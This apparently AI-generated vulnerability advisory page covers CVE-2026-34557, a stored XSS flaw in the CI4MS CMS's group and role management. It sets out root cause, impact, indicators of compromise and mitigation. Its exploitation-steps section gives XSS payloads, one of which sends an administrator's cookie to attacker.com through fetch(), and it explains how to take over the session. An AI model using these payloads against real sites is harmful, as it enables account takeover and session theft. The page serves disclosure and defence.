CVE-2026-34557: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34557 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton with RBAC authorization and theme support. The flaw exists in the group and role management functionality, where multiple input fields fail to sanitize user-controlled input before storing and rendering it in privileged administrative views. It affects all CI4MS versions up to and including 0.28.6.0, and was disclosed on March 30, 2026, with a patch released in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, though NVD scores it at 9.0 (Critical) (Github Advisory, Feedly).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant where user-supplied input in group/role management fields is persisted to the database without sanitization and later rendered using unsafe DOM sinks (e.g., .html() or innerHTML-style operations) in administrative views without output encoding. An attacker with low-privilege authenticated access can inject a malicious JavaScript payload — such as <img src=x onerror=alert(document.domain)> — into any of three distinct group-related input fields. The payload is stored server-side and executes automatically in the browser of any administrator who visits the /backend/users/groupList/ endpoint. The advisory includes a video proof-of-concept demonstrating the full exploitation chain (Github Advisory, GitHub Security Advisory).

Impact

Successful exploitation enables persistent JavaScript execution in the browsers of privileged administrators, leading to full administrator account takeover and complete application compromise. An attacker can steal session tokens, perform unauthorized administrative actions, escalate privileges, and modify system configurations — effectively gaining control over all roles and permissions within the application. The scope change (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect the broader application and its users (Github Advisory, Feedly).

Exploitability

A proof-of-concept exploit with detailed reproduction steps and a video demonstration is publicly available via the GitHub Security Advisory (GitHub Security Advisory). The EPSS score is approximately 0.046% (Feedly) to 0.025% (GitHub Advisory), indicating a currently low probability of widespread exploitation within 30 days. There is no evidence of active in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Github Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify a target CI4MS instance running version 0.28.6.0 or earlier. Confirm the presence of the group/role management interface at /backend/users/groupList/.
  2. Authenticate with low-privilege account: Log in to the CI4MS application using any valid low-privilege user account (e.g., a standard registered user with access to group management).
  3. Navigate to Group/Role Management: Access the Group or Role Management page within the backend administrative interface.
  4. Inject XSS payload: Insert a malicious JavaScript payload into one or more of the three vulnerable group-related input fields. Example payload: <img src=x onerror=alert(document.domain)>. For a more impactful attack, use a payload that exfiltrates the administrator's session cookie: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">.
  5. Save the malicious group/role: Submit the form to persist the payload server-side without triggering any sanitization.
  6. Wait for administrator interaction: The stored payload executes automatically when any administrator navigates to the group or role management page — no further attacker interaction is required.
  7. Achieve account takeover: Use the stolen session token to authenticate as the administrator, gaining full control over the application, all roles, and all user accounts (GitHub Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the server or administrator's browser to unexpected external domains (e.g., attacker-controlled endpoints) originating from administrative page views; unusual GET/POST requests to /backend/users/groupList/ containing encoded JavaScript or HTML entities.
  • Logs: Web server access logs showing requests to /backend/users/groupList/ followed shortly by outbound connections to unknown IPs; application logs recording group/role field values containing HTML tags such as <img>, <script>, or onerror attributes.
  • File System: No direct file system artifacts expected for this XSS type, but review database records in group/role management tables for entries containing JavaScript payloads or HTML event handlers.
  • Browser/Session: Administrator sessions invalidated or reused from unexpected IP addresses or user agents shortly after viewing the group management page; unexpected administrative actions (new users created, roles modified) not initiated by known administrators (Github Advisory).

Mitigation and workarounds

The vendor has released a patch in CI4MS version 0.31.0.0, which addresses the lack of input sanitization and output encoding in group and role management functionality. All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations, administrators should implement strict input validation and HTML output encoding for all user-controlled fields, replace unsafe DOM sinks (.html(), innerHTML) with safe alternatives, implement Content Security Policy (CSP) headers, and restrict access to role and permission management pages to only essential administrative accounts. Additionally, applying HttpOnly, SameSite, and Secure flags to session cookies will reduce the impact of any successful XSS exploitation (Github Advisory, GitHub Security Advisory).

Community reactions

The vulnerability received coverage from The Hacker Wire, which published an article on the stored XSS issue in CI4MS group/role management (The Hacker Wire). An independent advisory was also published by Yazoul.net (Yazoul Advisory). Social media discussion was noted on Mastodon, with security community members sharing the advisory. The vulnerability was also tracked by InfinitSec, which highlighted the potential for full account takeover (InfinitSec). Overall community sentiment reflects concern about the critical severity and the ease of exploitation given the public PoC.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management